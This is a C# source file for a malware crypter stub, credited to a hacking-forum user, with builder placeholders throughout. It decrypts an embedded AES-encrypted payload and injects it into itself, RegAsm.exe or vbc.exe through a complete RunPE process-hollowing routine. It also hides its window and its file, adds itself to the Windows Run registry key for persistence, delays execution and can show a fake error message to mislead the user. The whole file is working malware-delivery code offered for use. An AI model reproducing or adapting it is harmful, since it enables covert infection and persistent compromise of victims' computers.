using Microsoft.Win32; using System; using System.IO; using System.Reflection; using System.Resources; using System.Threading; using System.Windows.Forms; using System.Runtime.InteropServices; using System.Security.Cryptography; using System.Diagnostics; using System.ComponentModel; using System.Text; [assembly: AssemblyTitle("[title-replace]")] [assembly: AssemblyDescription("[desc-replace]")] [assembly: AssemblyCompany("[company-replace]")] [assembly: AssemblyProduct("[product-replace]")] [assembly: AssemblyCopyright("[copyright-replace]")] [assembly: AssemblyTrademark("[trademark-replace]")] [assembly: AssemblyVersion("[version-replace]")] [assembly: AssemblyFileVersion("[fversion-replace]")] //Copyright 2016 //Made by mrmutt for hackforums uid=3005497 //Please leave this note here namespace stupidcancercodeisruiningeverything { static class Program { [STAThread] static void Main() { //Basic delay Thread.Sleep([delay-replace] * 1000); Application.EnableVisualStyles(); Application.SetCompatibleTextRenderingDefault(false); Application.Run(new FrmOne()); } } class Reader { //Reading the encrypted bytes from our resource file public static byte[] ReadManaged() { ResourceManager manager = new ResourceManager("Encrypted", Assembly.GetEntryAssembly()); byte[] bytes = (byte[])manager.GetObject("encfile"); return bytes; } } public class FrmOne : Form { //Making the form hidden private void InitializeComponent() { SuspendLayout(); ResumeLayout(false); PerformLayout(); ShowInTaskbar = false; WindowState = FormWindowState.Minimized; } //Self explantory bool _startup = [startup-replace]; string injectTo = "[inject-replace]"; bool _fakemessage = [fakemessage-replace]; string injectionPath2 = Path.Combine(RuntimeEnvironment.GetRuntimeDirectory(), "RegAsm.exe"); string injectionPath3 = Path.Combine(RuntimeEnvironment.GetRuntimeDirectory(), "vbc.exe"); public FrmOne() { InitializeComponent(); //Giving a byte array for our encrypted bytes byte[] fBytes = Reader.ReadManaged(); //The encryption key string encKey = "[key-replace]"; //The encryption key in bytes byte[] encKey2 = Encoding.UTF8.GetBytes(encKey); //Makign a hash for the encryption key encKey2 = SHA256.Create().ComputeHash(encKey2); //The decrypted bytes byte[] eBytes = AESDecrypt(fBytes,encKey2); //Crypting process string result = Encoding.UTF8.GetString(eBytes); //The all decrypted bytes byte[] eBytes2 = Convert.FromBase64String(result); //If user choosed startup add to startup if (_startup) AddToStartup(); //Make the file hidden HideFile(); Thread.Sleep(500); //Use the runpe to inject the decrypted bytes into a process of our injection method choice if(injectTo == "[itself]") KillerMemestart.FMEMES(System.Diagnostics.Process.GetCurrentProcess().MainModule.FileName,"",eBytes2); if(injectTo =="[regasm]") KillerMemestart.FMEMES(injectionPath2, "", eBytes2); if(injectTo == "[vbc]") KillerMemestart.FMEMES(injectionPath3, "", eBytes2); //Fake Message if(_fakemessage) { MessageBox.Show("[messagetext-replace]", "[messagetitle-replace]", MessageBoxButtons.OK,MessageBoxIcon.Error); } //Stopping the program because runpe is already injected Environment.Exit(0); } //Decryption method public static byte[] AESDecrypt(byte[] decrypted, byte[] key2) { byte[] decryptedBytes = null; byte[] saltBytes = new byte[] {1, 2, 3, 4, 5, 6, 7, 8}; using (MemoryStream ms = new MemoryStream()) { using (RijndaelManaged AES = new RijndaelManaged()) { AES.KeySize = 256; AES.BlockSize = 128; Rfc2898DeriveBytes key = new Rfc2898DeriveBytes(key2, saltBytes, 1000); AES.Key = key.GetBytes(AES.KeySize/8); AES.IV = key.GetBytes(AES.BlockSize/8); AES.Mode = CipherMode.CBC; using (CryptoStream cs = new CryptoStream(ms, AES.CreateDecryptor(), CryptoStreamMode.Write)) { cs.Write(decrypted, 0, decrypted.Length); cs.Close(); } decryptedBytes = ms.ToArray(); } } return decryptedBytes; } //The adding to startup public void AddToStartup() { string path = Path.Combine(Application.UserAppDataPath, "[fname-replace]"); string path2 = Path.Combine(path, "[finame-replace].exe"); if (!File.Exists(path2)) { DirectoryInfo di = Directory.CreateDirectory(path); File.Copy(Application.ExecutablePath, path2, true); RegistryKey key = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", true); if (key != null) key.SetValue("[regkey-replace]", path2); } } public void HideFile() { //Hiding FileInfo f = new FileInfo(Application.ExecutablePath); f.Attributes = FileAttributes.Hidden; } } static class KillerMemestart { [DllImport("kernel32.dll", EntryPoint = "CreateProcess", CharSet = CharSet.Unicode)] private static extern bool CreateProcess(string applicationName, string commandLine, IntPtr processAttributes, IntPtr threadAttributes, bool inheritHandles, uint creationFlags, IntPtr environment, string currentDirectory, ref StartupInformation startupInfo, ref ProcessInformation processInformation); [DllImport("kernel32.dll", EntryPoint = "GetThreadContext")] private static extern bool GetThreadContext(IntPtr thread, int[] context); [DllImport("kernel32.dll", EntryPoint = "SetThreadContext")] private static extern bool SetThreadContext(IntPtr thread, int[] context); [DllImport("kernel32.dll", EntryPoint = "ReadProcessMemory")] private static extern bool ReadProcessMemory(IntPtr process, int baseAddress, ref int buffer, int bufferSize, ref int bytesRead); [DllImport("kernel32.dll", EntryPoint = "WriteProcessMemory")] private static extern bool WriteProcessMemory(IntPtr process, int baseAddress, byte[] buffer, int bufferSize, ref int bytesWritten); [DllImport("ntdll.dll", EntryPoint = "NtUnmapViewOfSection")] private static extern int NtUnmapViewOfSection(IntPtr process, int baseAddress); [DllImport("kernel32.dll", EntryPoint = "VirtualAllocEx")] private static extern int VirtualAllocEx(IntPtr handle, int address, int length, int type, int protect); [DllImport("kernel32.dll", EntryPoint = "ResumeThread")] private static extern int ResumeThread(IntPtr handle); [StructLayout(LayoutKind.Sequential, Pack = 1)] private struct ProcessInformation { public readonly IntPtr ProcessHandle; public readonly IntPtr ThreadHandle; private readonly uint ProcessId; private readonly uint ThreadId; } [StructLayout(LayoutKind.Sequential, Pack = 1)] private struct StartupInformation { public uint Size; private readonly string Reserved1; private readonly string Desktop; private readonly string Title; [MarshalAs(UnmanagedType.ByValArray, SizeConst = 36)] private readonly byte[] Misc; private readonly IntPtr Reserved2; private readonly IntPtr StdInput; private readonly IntPtr StdOutput; private readonly IntPtr StdError; } public static bool FMEMES(string path, string cmd, byte[] data) { int readWrite = 0; string quotedPath = string.Format("\"{0}\"", path); StartupInformation si = new StartupInformation(); ProcessInformation pi = new ProcessInformation(); si.Size = Convert.ToUInt32(Marshal.SizeOf(typeof(StartupInformation))); if (string.IsNullOrEmpty(cmd)) { if (!CreateProcess(path, quotedPath, IntPtr.Zero, IntPtr.Zero, false, 4, IntPtr.Zero, null, ref si, ref pi)) return false; } else { quotedPath = quotedPath + " " + cmd; if (!CreateProcess(path, quotedPath, IntPtr.Zero, IntPtr.Zero, false, 4, IntPtr.Zero, null, ref si, ref pi)) return false; } int fileAddress = BitConverter.ToInt32(data, 60); int imageBase = BitConverter.ToInt32(data, fileAddress + 52); int[] context = new int[179]; context[0] = 65538; if (!GetThreadContext(pi.ThreadHandle, context)) return false; int ebx = context[41]; int baseAddress = 0; if (!ReadProcessMemory(pi.ProcessHandle, ebx + 8, ref baseAddress, 4, ref readWrite)) return false; if (imageBase == baseAddress) { if (NtUnmapViewOfSection(pi.ProcessHandle, baseAddress) != 0) return false; } int sizeOfImage = BitConverter.ToInt32(data, fileAddress + 80); int sizeOfHeaders = BitConverter.ToInt32(data, fileAddress + 84); bool allowOverride = false; int newImageBase = VirtualAllocEx(pi.ProcessHandle, imageBase, sizeOfImage, 12288, 64); if (newImageBase == 0) { allowOverride = true; newImageBase = VirtualAllocEx(pi.ProcessHandle, 0, sizeOfImage, 12288, 64); if (newImageBase == 0) return false; } if (!WriteProcessMemory(pi.ProcessHandle, newImageBase, data, sizeOfHeaders, ref readWrite)) return false; int sectionOffset = fileAddress + 248; short numberOfSections = BitConverter.ToInt16(data, fileAddress + 6); for (int I = 0; I <= numberOfSections - 1; I++) { int virtualAddress = BitConverter.ToInt32(data, sectionOffset + 12); int sizeOfRawData = BitConverter.ToInt32(data, sectionOffset + 16); int pointerToRawData = BitConverter.ToInt32(data, sectionOffset + 20); if (sizeOfRawData != 0) { byte[] sectionData = new byte[sizeOfRawData]; Buffer.BlockCopy(data, pointerToRawData, sectionData, 0, sectionData.Length); if (!WriteProcessMemory(pi.ProcessHandle, newImageBase + virtualAddress, sectionData, sectionData.Length, ref readWrite)) return false; } sectionOffset += 40; } byte[] pointerData = BitConverter.GetBytes(newImageBase); if (!WriteProcessMemory(pi.ProcessHandle, ebx + 8, pointerData, 4, ref readWrite)) return false; int addressOfEntryPoint = BitConverter.ToInt32(data, fileAddress + 40); if (allowOverride) newImageBase = imageBase; context[44] = newImageBase + addressOfEntryPoint; if (!SetThreadContext(pi.ThreadHandle, context)) return false; if (ResumeThread(pi.ThreadHandle) == -1) return false; return true; } } }